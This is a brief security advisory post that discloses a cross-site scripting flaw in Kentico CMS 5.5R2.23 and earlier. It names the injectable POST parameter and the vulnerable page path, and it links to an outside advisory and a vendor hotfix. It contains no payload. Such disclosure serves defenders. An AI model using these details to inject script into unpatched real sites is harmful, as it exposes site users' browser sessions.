Kentico CMS 5.5R2.23 and bellow XSS POST Injection Vulnerability + Fix

Kentico CMS suffers from a XSS vulnerability when parsing user input to the ‘userContextMenu_parameter’ parameter via POST method in ‘/examples/webparts/membership/users-viewer.aspx’. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5015.php

Vendor patch: http://devnet.kentico.com/Bugtracker/Hotfixes.aspx

t00t!

Comment are closed.